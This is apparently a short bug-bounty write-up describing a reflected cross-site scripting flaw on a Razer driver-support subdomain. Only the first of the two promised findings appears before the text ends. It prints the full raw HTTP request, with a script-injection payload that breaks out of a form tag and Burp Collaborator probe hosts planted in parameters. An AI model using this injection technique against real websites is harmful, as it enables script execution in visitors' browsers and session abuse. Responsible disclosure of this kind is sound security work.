2 Reflected XSS In Razer

2 min readNov 21, 2020

First Of All thanks for reading my first write up in medium

My Name Is Mostafa I Am Working As information Security Engineer And My Part Time Doing Some Bug Hunting

I Found 2 Vulnerabilities In The Different Subdomains in Razer

The First One is reflected XSS in (http://drivers.razersupport.com)

When I Searching To XSS Looked To Refelected Params I Found CSRF Token Have Been reflected and Commented In HTML Response So This Is The First One I Just Close The Form Tag And Wrote XSS Payload And Has Been Executed

GET /index.php?_m=k2n4qnfei8t8yk2e7ua78c7m7dd41t.burpcollaborator.net&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131&_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131 → →”></form><h1><script>alert(document.domain)</script></h1> HTTP/1.1
Host: drivers.razersupport.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SWIFT_sessionid40=59cpx8mzpt0t559zefhsfxe7eykq8f.burpcollaborator.net; _gcl_au=1.1.291319320.1592845997; __utma=124197257.1459569068.1592845998.1592845998.1592845998.1; __utmc=124197257; __utmz=124197257.1592845998.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt=1; __utmb=124197257.1.10.1592845998; _ga=GA1.2.1459569068.1592845998; _gid=GA1.2.741943482.1592845999; __unam=c0300f2–172dd050e1d-36a23205–2; _dc_gtm_UA-33485401–2=1
Connection: close